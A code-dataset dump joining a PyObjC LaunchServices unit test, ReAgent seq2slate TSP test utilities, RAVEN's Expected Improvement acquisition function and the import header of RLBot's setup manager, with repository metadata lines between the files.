self.assertEqual(LaunchServices.kLSNoLaunchPermissionErr, -10826)
self.assertEqual(LaunchServices.kLSNoExecutableErr, -10827)
self.assertEqual(LaunchServices.kLSNoClassicEnvironmentErr, -10828)
self.assertEqual(LaunchServices.kLSMultipleSessionsNotSupportedErr, -10829)
self.assertEqual(LaunchServices.kLSInitializeDefaults, 0x00000001)
self.assertEqual(LaunchServices.kLSMinCatInfoBitmap, 6154)
self.assertEqual(LaunchServices.kLSRequestExtension, 0x00000001)
self.assertEqual(LaunchServices.kLSRequestTypeCreator, 0x00000002)
self.assertEqual(LaunchServices.kLSRequestBasicFlagsOnly, 0x00000004)
self.assertEqual(LaunchServices.kLSRequestAppTypeFlags, 0x00000008)
self.assertEqual(LaunchServices.kLSRequestAllFlags, 0x00000010)
self.assertEqual(LaunchServices.kLSRequestIconAndKind, 0x00000020)
self.assertEqual(LaunchServices.kLSRequestExtensionFlagsOnly, 0x00000040)
self.assertEqual(LaunchServices.kLSRequestAllInfo, 0xFFFFFFFF)
self.assertEqual(LaunchServices.kLSItemInfoIsPlainFile, 0x00000001)
self.assertEqual(LaunchServices.kLSItemInfoIsPackage, 0x00000002)
self.assertEqual(LaunchServices.kLSItemInfoIsApplication, 0x00000004)
self.assertEqual(LaunchServices.kLSItemInfoIsContainer, 0x00000008)
self.assertEqual(LaunchServices.kLSItemInfoIsAliasFile, 0x00000010)
self.assertEqual(LaunchServices.kLSItemInfoIsSymlink, 0x00000020)
self.assertEqual(LaunchServices.kLSItemInfoIsInvisible, 0x00000040)
self.assertEqual(LaunchServices.kLSItemInfoIsNativeApp, 0x00000080)
self.assertEqual(LaunchServices.kLSItemInfoIsClassicApp, 0x00000100)
self.assertEqual(LaunchServices.kLSItemInfoAppPrefersNative, 0x00000200)
self.assertEqual(LaunchServices.kLSItemInfoAppPrefersClassic, 0x00000400)
self.assertEqual(LaunchServices.kLSItemInfoAppIsScriptable, 0x00000800)
self.assertEqual(LaunchServices.kLSItemInfoIsVolume, 0x00001000)
self.assertEqual(LaunchServices.kLSItemInfoExtensionIsHidden, 0x00100000)
self.assertEqual(LaunchServices.kLSRolesNone, 0x00000001)
self.assertEqual(LaunchServices.kLSRolesViewer, 0x00000002)
self.assertEqual(LaunchServices.kLSRolesEditor, 0x00000004)
self.assertEqual(LaunchServices.kLSRolesShell, 0x00000008)
self.assertEqual(LaunchServices.kLSRolesAll, 0xFFFFFFFF, 0xFFFFFFFFFFFFFFFF)
self.assertEqual(LaunchServices.kLSUnknownKindID, 0)
self.assertEqual(LaunchServices.kLSUnknownType, 0)
self.assertEqual(LaunchServices.kLSUnknownCreator, 0)
self.assertEqual(LaunchServices.kLSAcceptDefault, 0x00000001)
self.assertEqual(LaunchServices.kLSAcceptAllowLoginUI, 0x00000002)
self.assertIsInstance(LaunchServices.kLSItemContentType, str)
self.assertIsInstance(LaunchServices.kLSItemFileType, str)
self.assertIsInstance(LaunchServices.kLSItemFileCreator, str)
self.assertIsInstance(LaunchServices.kLSItemExtension, str)
self.assertIsInstance(LaunchServices.kLSItemDisplayName, str)
self.assertIsInstance(LaunchServices.kLSItemDisplayKind, str)
self.assertIsInstance(LaunchServices.kLSItemRoleHandlerDisplayName, str)
self.assertIsInstance(LaunchServices.kLSItemIsInvisible, str)
self.assertIsInstance(LaunchServices.kLSItemExtensionIsHidden, str)
self.assertIsInstance(LaunchServices.kLSItemQuarantineProperties, str)
self.assertEqual(LaunchServices.kLSHandlerOptionsDefault, 0)
self.assertEqual(LaunchServices.kLSHandlerOptionsIgnoreCreator, 1)
def testStructs(self):
v = LaunchServices.LSItemInfoRecord()
self.assertHasAttr(v, "flags")
self.assertHasAttr(v, "filetype")
self.assertHasAttr(v, "creator")
self.assertHasAttr(v, "extension")
self.assertNotHasAttr(v, "iconFileName")
self.assertNotHasAttr(v, "kindID")
def testFunctions(self):
LaunchServices.LSInit(LaunchServices.kLSInitializeDefaults)
LaunchServices.LSTerm()
url = LaunchServices.CFURLCreateFromFileSystemRepresentation(
None, self.bpath, len(self.bpath), True
)
self.assertIsInstance(url, LaunchServices.CFURLRef)
ok, info = LaunchServices.LSCopyItemInfoForURL(
url,
LaunchServices.kLSRequestExtension | LaunchServices.kLSRequestTypeCreator,
None,
)
self.assertEqual(ok, 0)
self.assertIsInstance(info, LaunchServices.LSItemInfoRecord)
self.assertArgIsOut(LaunchServices.LSGetExtensionInfo, 2)
ok, info = LaunchServices.LSGetExtensionInfo(len(self.path), self.path, None)
self.assertEqual(ok, 0)
self.assertEqual(info, self.path.rindex(".") + 1)
self.assertArgIsOut(LaunchServices.LSCopyDisplayNameForURL, 1)
self.assertArgIsCFRetained(LaunchServices.LSCopyDisplayNameForURL, 1)
ok, info = LaunchServices.LSCopyDisplayNameForURL(url, None)
self.assertEqual(ok, 0)
self.assertIsInstance(info, str)
self.assertArgIsBOOL(LaunchServices.LSSetExtensionHiddenForURL, 1)
ok = LaunchServices.LSSetExtensionHiddenForURL(url, True)
self.assertEqual(ok, 0)
self.assertArgIsOut(LaunchServices.LSCopyKindStringForURL, 1)
self.assertArgIsCFRetained(LaunchServices.LSCopyKindStringForURL, 1)
ok, info = LaunchServices.LSCopyKindStringForURL(url, None)
self.assertEqual(ok, 0)
self.assertIsInstance(info, str)
self.assertArgIsOut(LaunchServices.LSCopyKindStringForTypeInfo, 3)
self.assertArgIsCFRetained(LaunchServices.LSCopyKindStringForTypeInfo, 3)
ok, info = LaunchServices.LSCopyKindStringForTypeInfo(
LaunchServices.kLSUnknownType, LaunchServices.kLSUnknownCreator, "jpg", None
)
self.assertEqual(ok, 0)
self.assertIsInstance(info, str)
self.assertArgIsOut(LaunchServices.LSCopyKindStringForMIMEType, 1)
self.assertArgIsCFRetained(LaunchServices.LSCopyKindStringForMIMEType, 1)
ok, info = LaunchServices.LSCopyKindStringForMIMEType("text/plain", None)
self.assertIsInstance(ok, int)
# XXX: For some reason this fails sometimes...
# self.assertEqual(ok, 0)
self.assertIsInstance(info, (str, type(None)))
self.assertArgIsOut(LaunchServices.LSGetApplicationForInfo, 4)
self.assertArgIsOut(LaunchServices.LSGetApplicationForInfo, 5)
self.assertArgIsCFRetained(LaunchServices.LSGetApplicationForInfo, 5)
ok, ref, info_url = LaunchServices.LSGetApplicationForInfo(
LaunchServices.kLSUnknownType,
LaunchServices.kLSUnknownCreator,
"txt",
LaunchServices.kLSRolesAll,
None,
None,
)
self.assertEqual(ok, 0)
self.assertIsInstance(ref, objc.FSRef)
self.assertIsInstance(info_url, LaunchServices.CFURLRef)
self.assertArgIsOut(LaunchServices.LSCopyApplicationForMIMEType, 2)
self.assertArgIsCFRetained(LaunchServices.LSCopyApplicationForMIMEType, 2)
ok, info_url = LaunchServices.LSCopyApplicationForMIMEType(
"text/plain", LaunchServices.kLSRolesAll, None
)
self.assertEqual(ok, 0)
self.assertIsInstance(info_url, LaunchServices.CFURLRef)
self.assertArgIsOut(LaunchServices.LSGetApplicationForURL, 2)
self.assertArgIsOut(LaunchServices.LSGetApplicationForURL, 3)
self.assertArgIsCFRetained(LaunchServices.LSGetApplicationForURL, 3)
ok, ref, info_url = LaunchServices.LSGetApplicationForURL(
url, LaunchServices.kLSRolesAll, None, None
)
self.assertEqual(ok, 0)
self.assertIsInstance(ref, objc.FSRef)
self.assertIsInstance(info_url, LaunchServices.CFURLRef)
self.assertArgIsOut(LaunchServices.LSFindApplicationForInfo, 3)
self.assertArgIsOut(LaunchServices.LSFindApplicationForInfo, 4)
self.assertArgIsCFRetained(LaunchServices.LSFindApplicationForInfo, 4)
ok, ref, info_url = LaunchServices.LSFindApplicationForInfo(
LaunchServices.kLSUnknownCreator, None, "foo.app", None, None
)
# XXX: The code looks correct but fails, however the corresponding C code also fails.
# self.assertEqual(ok, 0)
self.assertIsInstance(ok, int)
if ref is not None:
self.assertIsInstance(ref, objc.FSRef)
if info_url is not None:
self.assertIsInstance(info_url, LaunchServices.CFURLRef)
self.assertArgIsOut(LaunchServices.LSCanURLAcceptURL, 4)
ok, status = LaunchServices.LSCanURLAcceptURL(
url, url, LaunchServices.kLSRolesAll, LaunchServices.kLSAcceptDefault, None
)
self.assertIsInstance(ok, int)
self.assertIsInstance(status, bool)
ok = LaunchServices.LSRegisterURL(url, False)
self.assertIsInstance(ok, int)
v = LaunchServices.LSCopyApplicationURLsForURL(url, LaunchServices.kLSRolesAll)
self.assertIsInstance(v, LaunchServices.CFArrayRef)
for a in v:
self.assertIsInstance(a, LaunchServices.CFURLRef)
default_role = LaunchServices.LSCopyDefaultRoleHandlerForContentType(
"public.plain-text", LaunchServices.kLSRolesAll
)
if os_level_key(os_release()) < os_level_key("10.7"):
if default_role is not None:
self.assertIsInstance(default_role, str)
else:
self.assertIsInstance(default_role, str)
v = LaunchServices.LSCopyAllRoleHandlersForContentType(
"public.plain-text", LaunchServices.kLSRolesAll
)
self.assertIsInstance(v, LaunchServices.CFArrayRef)
for a in v:
self.assertIsInstance(a, str)
ok = LaunchServices.LSSetDefaultRoleHandlerForContentType(
"public.plain-text", LaunchServices.kLSRolesAll, default_role
)
self.assertIsInstance(ok, int)
v = LaunchServices.LSGetHandlerOptionsForContentType("public.plain-text")
self.assertIsInstance(v, int)
ok = LaunchServices.LSSetHandlerOptionsForContentType("public.plain-text", v)
self.assertIsInstance(ok, int)
self.assertResultIsCFRetained(LaunchServices.LSCopyDefaultHandlerForURLScheme)
default_handler = LaunchServices.LSCopyDefaultHandlerForURLScheme("http")
if os_level_key(os_release()) < os_level_key("10.7"):
if default_handler is not None:
self.assertIsInstance(default_handler, str)
else:
self.assertIsInstance(default_handler, str)
self.assertResultIsCFRetained(LaunchServices.LSCopyAllHandlersForURLScheme)
v = LaunchServices.LSCopyAllHandlersForURLScheme("http")
self.assertIsInstance(v, LaunchServices.CFArrayRef)
for a in v:
self.assertIsInstance(a, str)
ok = LaunchServices.LSSetDefaultHandlerForURLScheme("http", default_handler)
self.assertIsInstance(ok, int)
def testFSRef(self):
ref = objc.FSRef.from_pathname(self.path)
self.assertIsInstance(ref, objc.FSRef)
ok, info = LaunchServices.LSCopyItemInfoForRef(
ref,
LaunchServices.kLSRequestExtension | LaunchServices.kLSRequestTypeCreator,
None,
)
self.assertEqual(ok, 0)
self.assertIsInstance(info, LaunchServices.LSItemInfoRecord)
self.assertArgIsOut(LaunchServices.LSCopyDisplayNameForRef, 1)
self.assertArgIsCFRetained(LaunchServices.LSCopyDisplayNameForRef, 1)
ok, info = LaunchServices.LSCopyDisplayNameForRef(ref, None)
self.assertEqual(ok, 0)
self.assertIsInstance(info, str)
self.assertArgIsBOOL(LaunchServices.LSSetExtensionHiddenForRef, 1)
ok = LaunchServices.LSSetExtensionHiddenForRef(ref, True)
self.assertEqual(ok, 0)
self.assertArgIsOut(LaunchServices.LSCopyKindStringForRef, 1)
self.assertArgIsCFRetained(LaunchServices.LSCopyKindStringForRef, 1)
ok, info = LaunchServices.LSCopyKindStringForRef(ref, None)
self.assertEqual(ok, 0)
self.assertIsInstance(info, str)
self.assertArgIsOut(LaunchServices.LSGetApplicationForItem, 2)
self.assertArgIsOut(LaunchServices.LSGetApplicationForItem, 3)
self.assertArgIsCFRetained(LaunchServices.LSGetApplicationForItem, 3)
ok, info_ref, info_url = LaunchServices.LSGetApplicationForItem(
ref, LaunchServices.kLSRolesAll, None, None
)
self.assertEqual(ok, 0)
self.assertIsInstance(info_ref, objc.FSRef)
self.assertIsInstance(info_url, LaunchServices.CFURLRef)
if os.path.exists("/Applications/TextEdit.app"):
app_ref = objc.FSRef.from_pathname("/Applications/TextEdit.app")
else:
app_ref = objc.FSRef.from_pathname("/System/Applications/TextEdit.app")
self.assertArgIsOut(LaunchServices.LSCanRefAcceptItem, 4)
ok, accepts = LaunchServices.LSCanRefAcceptItem(
ref,
app_ref,
LaunchServices.kLSRolesAll,
LaunchServices.kLSAcceptDefault,
None,
)
self.assertEqual(ok, 0)
self.assertIsInstance(accepts, bool)
ok = LaunchServices.LSRegisterFSRef(ref, False)
self.assertIsInstance(ok, int)
self.assertArgHasType(LaunchServices.LSCopyItemAttribute, 3, b"o^@")
ok, value = LaunchServices.LSCopyItemAttribute(
ref,
LaunchServices.kLSRolesAll,
LaunchServices.kLSItemExtensionIsHidden,
None,
)
self.assertEqual(ok, 0)
self.assertIsInstance(value, bool)
ok = LaunchServices.LSSetItemAttribute(
ref,
LaunchServices.kLSRolesAll,
LaunchServices.kLSItemRoleHandlerDisplayName,
"foo",
)
self.assertIsInstance(ok, int)
@min_os_level("10.10")
def testFunctions10_10(self):
self.assertResultIsCFRetained(LaunchServices.LSCopyDefaultApplicationURLForURL)
self.assertArgIsOut(LaunchServices.LSCopyDefaultApplicationURLForURL, 2)
self.assertResultIsCFRetained(
LaunchServices.LSCopyDefaultApplicationURLForContentType
)
self.assertArgIsOut(LaunchServices.LSCopyDefaultApplicationURLForContentType, 2)
self.assertResultIsCFRetained(
LaunchServices.LSCopyApplicationURLsForBundleIdentifier
)
self.assertArgIsOut(LaunchServices.LSCopyApplicationURLsForBundleIdentifier, 1)
|
5e3a9eca9988ab3b489484cc2e34ce4105e86210
|
b38247a5d84d8b52ce8363f8dd81629cfbe17f65
|
/reagent/test/ranking/seq2slate_utils.py
|
ba9caf83b747aa0bf3a78732239deb36dd5eb456
|
[
"BSD-3-Clause"
] |
permissive
|
facebookresearch/ReAgent
|
7f2b82eaaf7a19e58cc50aacc307d7b001231440
|
c5f1a8371a677b4f8fb0882b600bf331eba5259d
|
refs/heads/main
| 2023-09-05T15:56:49.175072
| 2023-08-29T21:48:40
| 2023-08-29T21:48:40
| 98,565,575
| 1,480
| 290
|
BSD-3-Clause
| 2023-09-12T23:09:30
| 2017-07-27T17:53:21
|
Python
|
UTF-8
|
Python
| false
| false
| 11,359
|
py
|
seq2slate_utils.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import logging
import math
import tempfile
from itertools import permutations
import pytorch_lightning as pl
import reagent.core.types as rlt
import torch
import torch.nn as nn
from reagent.core.parameters import Seq2SlateParameters
from reagent.core.parameters_seq2slate import LearningMethod, SimulationParameters
from reagent.core.torch_utils import gather
from reagent.model_utils.seq2slate_utils import Seq2SlateOutputArch
from reagent.models.seq2slate import Seq2SlateMode, Seq2SlateTransformerNet
from reagent.optimizer.union import Optimizer__Union
from reagent.training.ranking.seq2slate_sim_trainer import Seq2SlateSimulationTrainer
from reagent.training.ranking.seq2slate_trainer import Seq2SlateTrainer
from torch.utils.data import DataLoader
logger = logging.getLogger(__name__)
MODEL_TRANSFORMER = "transformer"
ON_POLICY = "on_policy"
OFF_POLICY = "off_policy"
SIMULATION = "simulation"
class TSPRewardModel(nn.Module):
def forward(self, state, candidates, ranked_cities, src_src_mask, tgt_out_idx):
reward = compute_reward(ranked_cities)
# negate because we want to minimize
return -reward
def post_preprocess_batch(seq2slate_net, candidate_num, batch, device, epoch):
model_propensity, model_action, reward = rank_on_policy_and_eval(
seq2slate_net, batch, candidate_num, greedy=False
)
batch = rlt.PreprocessedRankingInput.from_input(
state=batch.state.float_features,
candidates=batch.src_seq.float_features,
device=device,
action=model_action,
logged_propensities=model_propensity,
# negate because we want to minimize
slate_reward=-reward,
)
logger.info(f"Epoch {epoch} mean on_policy reward: {torch.mean(reward)}")
logger.info(f"Epoch {epoch} mean model_propensity: {torch.mean(model_propensity)}")
return batch
class Seq2SlateOnPolicyTrainer(Seq2SlateTrainer):
def on_train_batch_start(self, batch, batch_idx, dataloader_idx):
new_batch = post_preprocess_batch(
self.seq2slate_net,
self.seq2slate_net.max_src_seq_len,
batch,
batch.state.float_features.device,
self.current_epoch,
)
for attr in dir(new_batch):
if not callable(getattr(new_batch, attr)) and not attr.startswith("__"):
setattr(batch, attr, getattr(new_batch, attr))
super().on_train_batch_start(batch, batch_idx, dataloader_idx)
def create_trainer(
seq2slate_net,
learning_method,
batch_size,
learning_rate,
policy_gradient_interval,
device,
):
if learning_method == ON_POLICY:
seq2slate_params = Seq2SlateParameters(
on_policy=True, learning_method=LearningMethod.REINFORCEMENT_LEARNING
)
trainer_cls = Seq2SlateOnPolicyTrainer
elif learning_method == OFF_POLICY:
seq2slate_params = Seq2SlateParameters(
on_policy=False,
learning_method=LearningMethod.REINFORCEMENT_LEARNING,
)
trainer_cls = Seq2SlateTrainer
elif learning_method == SIMULATION:
temp_reward_model_path = tempfile.mkstemp(suffix=".pt")[1]
reward_model = torch.jit.script(TSPRewardModel())
torch.jit.save(reward_model, temp_reward_model_path)
seq2slate_params = Seq2SlateParameters(
on_policy=True,
learning_method=LearningMethod.SIMULATION,
simulation=SimulationParameters(
reward_name_weight={"tour_length": 1.0},
reward_name_power={"tour_length": 1.0},
reward_name_path={"tour_length": temp_reward_model_path},
),
)
trainer_cls = Seq2SlateSimulationTrainer
param_dict = {
"seq2slate_net": seq2slate_net,
"params": seq2slate_params,
"policy_optimizer": Optimizer__Union.default(lr=learning_rate),
"print_interval": 1,
"policy_gradient_interval": policy_gradient_interval,
}
return trainer_cls(**param_dict)
def create_seq2slate_net(
model_str,
candidate_num,
candidate_dim,
hidden_size,
output_arch,
temperature,
device,
):
if model_str == MODEL_TRANSFORMER:
return Seq2SlateTransformerNet(
state_dim=1,
candidate_dim=candidate_dim,
num_stacked_layers=2,
num_heads=2,
dim_model=hidden_size,
dim_feedforward=hidden_size,
max_src_seq_len=candidate_num,
max_tgt_seq_len=candidate_num,
output_arch=output_arch,
temperature=temperature,
state_embed_dim=1,
).to(device)
else:
raise NotImplementedError(f"unknown model type {model_str}")
FIX_CANDIDATES = None
@torch.no_grad()
def create_batch(
batch_size,
candidate_num,
candidate_dim,
device,
learning_method,
diverse_input=False,
):
# fake state, we only use candidates
state = torch.zeros(batch_size, 1)
if diverse_input:
# city coordinates are spread in [0, 4]
candidates = torch.randint(
5, (batch_size, candidate_num, candidate_dim)
).float()
else:
# every training data has the same nodes as the input cities
global FIX_CANDIDATES
if FIX_CANDIDATES is None or FIX_CANDIDATES.shape != (
batch_size,
candidate_num,
candidate_dim,
):
candidates = torch.randint(
5, (batch_size, candidate_num, candidate_dim)
).float()
candidates[1:] = candidates[0]
FIX_CANDIDATES = candidates
else:
candidates = FIX_CANDIDATES
batch_dict = {
"state": state,
"candidates": candidates,
"device": device,
}
if learning_method == OFF_POLICY:
# using data from a uniform sampling policy
action = torch.stack([torch.randperm(candidate_num) for _ in range(batch_size)])
propensity = torch.full((batch_size, 1), 1.0 / math.factorial(candidate_num))
ranked_cities = gather(candidates, action)
reward = compute_reward(ranked_cities)
batch_dict["action"] = action
batch_dict["logged_propensities"] = propensity
batch_dict["slate_reward"] = -reward
batch = rlt.PreprocessedRankingInput.from_input(**batch_dict)
logger.info("Generate one batch")
return batch
def create_train_and_test_batches(
batch_size,
candidate_num,
candidate_dim,
device,
num_train_batches,
learning_method,
diverse_input,
):
train_batches = [
create_batch(
batch_size,
candidate_num,
candidate_dim,
device,
learning_method,
diverse_input=diverse_input,
)
for _ in range(num_train_batches)
]
if diverse_input:
test_batch = create_batch(
batch_size,
candidate_num,
candidate_dim,
device,
learning_method,
diverse_input=diverse_input,
)
else:
test_batch = train_batches[0]
return train_batches, test_batch
def compute_reward(ranked_cities):
assert len(ranked_cities.shape) == 3
ranked_cities_offset = torch.roll(ranked_cities, shifts=1, dims=1)
return (
torch.sqrt(((ranked_cities_offset - ranked_cities) ** 2).sum(-1))
.sum(-1)
.unsqueeze(1)
)
def compute_best_reward(input_cities):
batch_size, candidate_num, _ = input_cities.shape
all_perm = torch.tensor(
list(permutations(torch.arange(candidate_num), candidate_num))
)
res = [
compute_reward(gather(input_cities, perm.repeat(batch_size, 1)))
for perm in all_perm
]
# res shape: batch_size, num_perm
res = torch.cat(res, dim=1)
best_possible_reward = torch.min(res, dim=1).values
best_possible_reward_mean = torch.mean(best_possible_reward)
return best_possible_reward_mean
@torch.no_grad()
def rank_on_policy(
model, batch: rlt.PreprocessedRankingInput, tgt_seq_len: int, greedy: bool
):
model.eval()
rank_output = model(
batch, mode=Seq2SlateMode.RANK_MODE, tgt_seq_len=tgt_seq_len, greedy=greedy
)
ranked_slate_prob = rank_output.ranked_per_seq_probs
ranked_order = rank_output.ranked_tgt_out_idx - 2
model.train()
return ranked_slate_prob, ranked_order
@torch.no_grad()
def rank_on_policy_and_eval(
seq2slate_net, batch: rlt.PreprocessedRankingInput, tgt_seq_len: int, greedy: bool
):
model_propensity, model_action = rank_on_policy(
seq2slate_net, batch, tgt_seq_len, greedy=greedy
)
ranked_cities = gather(batch.src_seq.float_features, model_action)
reward = compute_reward(ranked_cities)
return model_propensity, model_action, reward
def run_seq2slate_tsp(
model_str,
batch_size,
epochs,
candidate_num,
num_batches,
hidden_size,
diverse_input,
learning_rate,
expect_reward_threshold,
learning_method,
policy_gradient_interval,
device,
):
pl.seed_everything(0)
candidate_dim = 2
eval_sample_size = 1
train_batches, test_batch = create_train_and_test_batches(
batch_size,
candidate_num,
candidate_dim,
device,
num_batches,
learning_method,
diverse_input,
)
best_test_possible_reward = compute_best_reward(test_batch.src_seq.float_features)
seq2slate_net = create_seq2slate_net(
model_str,
candidate_num,
candidate_dim,
hidden_size,
Seq2SlateOutputArch.AUTOREGRESSIVE,
1.0,
device,
)
trainer = create_trainer(
seq2slate_net,
learning_method,
batch_size,
learning_rate,
policy_gradient_interval,
device,
)
def evaluate():
best_test_reward = torch.full((batch_size,), 1e9).to(device)
for _ in range(eval_sample_size):
model_propensities, _, reward = rank_on_policy_and_eval(
seq2slate_net.to(device), test_batch, candidate_num, greedy=True
)
best_test_reward = torch.where(
reward < best_test_reward, reward, best_test_reward
)
logger.info(
f"Test mean model_propensities {torch.mean(model_propensities)}, "
f"Test mean reward: {torch.mean(best_test_reward)}, "
f"best possible reward {best_test_possible_reward}"
)
if torch.any(torch.isnan(model_propensities)):
raise Exception("Model propensities contain NaNs")
ratio = torch.mean(best_test_reward) / best_test_possible_reward
return ratio < expect_reward_threshold, ratio
evaluate()
training_data = DataLoader(train_batches, collate_fn=lambda x: x[0])
pl_trainer = pl.Trainer(
max_epochs=epochs,
gpus=None if device == torch.device("cpu") else 1,
logger=False,
)
pl_trainer.fit(trainer, training_data)
result, ratio = evaluate()
assert result, (
f"Test failed because it did not reach expected test reward, "
f"{ratio} > {expect_reward_threshold}."
)
|
9c62a47a8fbb331afcccecbaad161ea36c3f815f
|
dcd772f567ef8a8a1173a9f437cd68f211fb9362
|
/ravenframework/Optimizers/acquisitionFunctions/ExpectedImprovement.py
|
eac639237a9240e6d0ac7beda89c72ef7929f6c9
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"BSD-2-Clause",
"BSD-3-Clause"
] |
permissive
|
idaholab/raven
|
39cdce98ad916c638399232cdc01a9be00e200a2
|
2b16e7aa3325fe84cab2477947a951414c635381
|
refs/heads/devel
| 2023-08-31T08:40:16.653099
| 2023-08-29T16:21:51
| 2023-08-29T16:21:51
| 85,989,537
| 201
| 126
|
Apache-2.0
| 2023-09-13T21:55:43
| 2017-03-23T19:29:27
|
C++
|
UTF-8
|
Python
| false
| false
| 5,235
|
py
|
ExpectedImprovement.py
|
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Class for implementing Expected Improvement
auth: Anthoney Griffith (@grifaa)
date: June, 2023
"""
# External Modules
from scipy.stats import norm
import numpy as np
# External Modules
# Internal Modules
import abc
from ...utils import utils, InputData, InputTypes
from .AcquisitionFunction import AcquisitionFunction
# Internal Modules
class ExpectedImprovement(AcquisitionFunction):
"""
Provides class for the Expected Improvement (EI) acquisition function
"""
##########################
# Initialization Methods #
##########################
@classmethod
def getInputSpecification(cls):
"""
Method to get a reference to a class that specifies the input data for class cls.
@ In, None
@ Out, specs, InputData.ParameterInput, class to use for specifying input of cls.
"""
specs = super(ExpectedImprovement, cls).getInputSpecification()
specs.description = r"""If this node is present within the acquisition node,
the expected improvement acqusition function is utilized.
This function is derived by applying Bayesian optimal decision making (Bellman's Principle of Optimality)
with a local reward utility function in conjunction with a one-step lookahead.
The approach weighs both expected reward and likely reward with the
following expression (for minimization):
$EI(x) = (f^*-\mu)\phi(\frac{f^*-\mu}{s}) + s \Phi(\frac{f^*-\mu}{s})$"""
return specs
######################
# Evaluation Methods #
######################
def evaluate(self, var, bayesianOptimizer, vectorized=False):
"""
Evaluates acquisition function using the current BO instance
Should be overwritten by specific acquisition functions
@ In, var, np.array, input to evaluate Expected Improvement at
@ In, bayesianOptimizer, instance of the BayesianOptimizer cls, provides access to model and evaluation method
@ In, vectorized, bool, whether the evaluation should be vectorized or not (useful for differential evolution)
@ Out, EI, float, expected improvement function value
"""
# Need to retrieve current optimum point
best = bayesianOptimizer._optPointHistory[0][-1][0]
fopt = best[bayesianOptimizer._objectiveVar]
# Need to convert array input "x" into dict point
featurePoint = bayesianOptimizer.arrayToFeaturePoint(var)
# Evaluate posterior mean and standard deviation
mu, s = bayesianOptimizer._evaluateRegressionModel(featurePoint)
# Is this evaluation vectorized?
if vectorized:
betaVec = np.divide(np.add(-mu, fopt),s)
pdfVec = norm.pdf(betaVec)
cdfVec = norm.cdf(betaVec)
term1 = np.multiply(np.add(-mu, fopt), cdfVec)
term2 = np.multiply(s, pdfVec)
EI = np.add(term1, term2)
else:
# Breaking out components from closed-form of EI (GPR)
# Definition of standard gaussian density function
beta = (fopt - mu) / s
pdf = norm.pdf(beta)
# Standard normal cdf from scipy.stats
cdf = norm.cdf(beta)
# Definition of EI
EI = ((fopt - mu) * cdf) + (s * pdf)
return EI
def gradient(self, var, bayesianOptimizer):
"""
Evaluates acquisition function's gradient using the current BO instance/ROM
Should be overwritten by specific acquisition functions
@ In, var, np.array, input to evaluate Expected Improvement gradient at
@ In, bayesianOptimizer, instance of the BayesianOptimizer cls, provides access to model and evaluation method
@ Out, EIGrad, float/array, EI gradient value
"""
# NOTE assumes scikitlearn GPR currently
# Need to convert array input "x" into dict point
featurePoint = bayesianOptimizer.arrayToFeaturePoint(var)
# Evaluate posterior mean and standard deviation
mu, s = bayesianOptimizer._evaluateRegressionModel(featurePoint)
meanGrad, stdGrad = bayesianOptimizer._model.supervisedContainer[0].evaluateGradients(var)
# Need to retrieve current optimum point
best = bayesianOptimizer._optPointHistory[0][-1][0]
fopt = best[bayesianOptimizer._objectiveVar]
# Other common quantities
beta = (fopt - mu)/s
phi = norm.pdf(beta)
Phi = norm.cdf(beta)
betaGrad = np.subtract(-s * np.transpose(meanGrad), (fopt - mu) * stdGrad) / (s**2)
# Derivative of standard normal pdf
phiGrad = (-beta / (np.sqrt(2 * np.pi))) * np.exp(-(beta**2) / 2)
EIGrad = stdGrad * phi - np.transpose(meanGrad) * Phi + betaGrad * (phi * (fopt - mu) + s * phiGrad)
return EIGrad
|
f64645241f91ba3803b8cdbefe297e9290e24047
|
59886a1143cc4043b19e398fae1fddb5742b4b55
|
/src/main/python/rlbot/setup_manager.py
|
b107541f877a62e8f8b7adf88e2ae250ef0a5ef4
|
[
"MIT"
] |
permissive
|
RLBot/RLBot
|
a6c4f502403f02822b3e4078b27583226584432e
|
c2f7c9a07911691b112b5338008e2ec932e7aee0
|
refs/heads/master
| 2023-08-16T06:04:35.384448
| 2023-07-01T11:21:26
| 2023-07-01T11:21:26
| 80,671,678
| 482
| 138
|
MIT
| 2023-07-01T11:21:28
| 2017-02-01T22:36:52
|
Python
|
UTF-8
|
Python
| false
| false
| 40,063
|
py
|
setup_manager.py
|
import signal
import multiprocessing as mp
import os
import sys
import json
from dataclasses import dataclass
import psutil
import platform
import queue
import subprocess
import time
import webbrowser
from contextlib import contextmanager
from datetime import datetime, timedelta
from pathlib import Path
from typing import List, Optional, Dict, Set
from urllib.parse import ParseResult as URL
from urllib.request import urlopen
from urllib.error import URLError
from dataclasses import dataclass
from rlbot.gamelaunch.epic_launch import launch_with_epic_login_trick, launch_with_epic_simple
from rlbot.socket.socket_data_reporter import get_one_packet
from rlbot.utils.structures import game_data_struct
from rlbot import gateway_util
from rlbot import version
from rlbot.base_extension import BaseExtension
from rlbot.botmanager.bot_manager_independent import BotManagerIndependent
from rlbot.botmanager.bot_manager_struct import BotManagerStruct
from rlbot.botmanager.helper_process_manager import HelperProcessManager
from rlbot.botmanager.agent_metadata import AgentMetadata
from rlbot.gateway_util import LaunchOptions, NetworkingRole
from rlbot.matchconfig.conversions import parse_match_config
from rlbot.matchconfig.match_config import MatchConfig, PlayerConfig
from rlbot.matchconfig.psyonix_config import set_random_psyonix_bot_preset
from rlbot.matchcomms.server import launch_matchcomms_server
from rlbot.parsing.bot_config_bundle import get_bot_config_bundle, BotConfigBundle, get_script_config_bundle
from rlbot.parsing.custom_config import ConfigObject
from rlbot.parsing.rlbot_config_parser import create_bot_config_layout
from rlbot.utils import process_configuration
from rlbot.utils.class_importer import import_class_with_base, import_agent
from rlbot.utils.logging_utils import get_logger, DEFAULT_LOGGER
from rlbot.utils.process_configuration import WrongProcessArgs
from rlbot.utils.structures.start_match_structures import MAX_PLAYERS
from rlbot.utils.structures.game_interface import GameInterface, USE_OLD_LAUNCH
from rlbot.utils.config_parser import mergeTASystemSettings, cleanUpTASystemSettings
from rlbot.parsing.rlbot_config_parser import LAUNCHER_PREFERENCE_KEY
from rlbot.matchcomms.server import MatchcommsServerThread
from rlbot.utils.virtual_environment_management import EnvBuilderWithRequirements
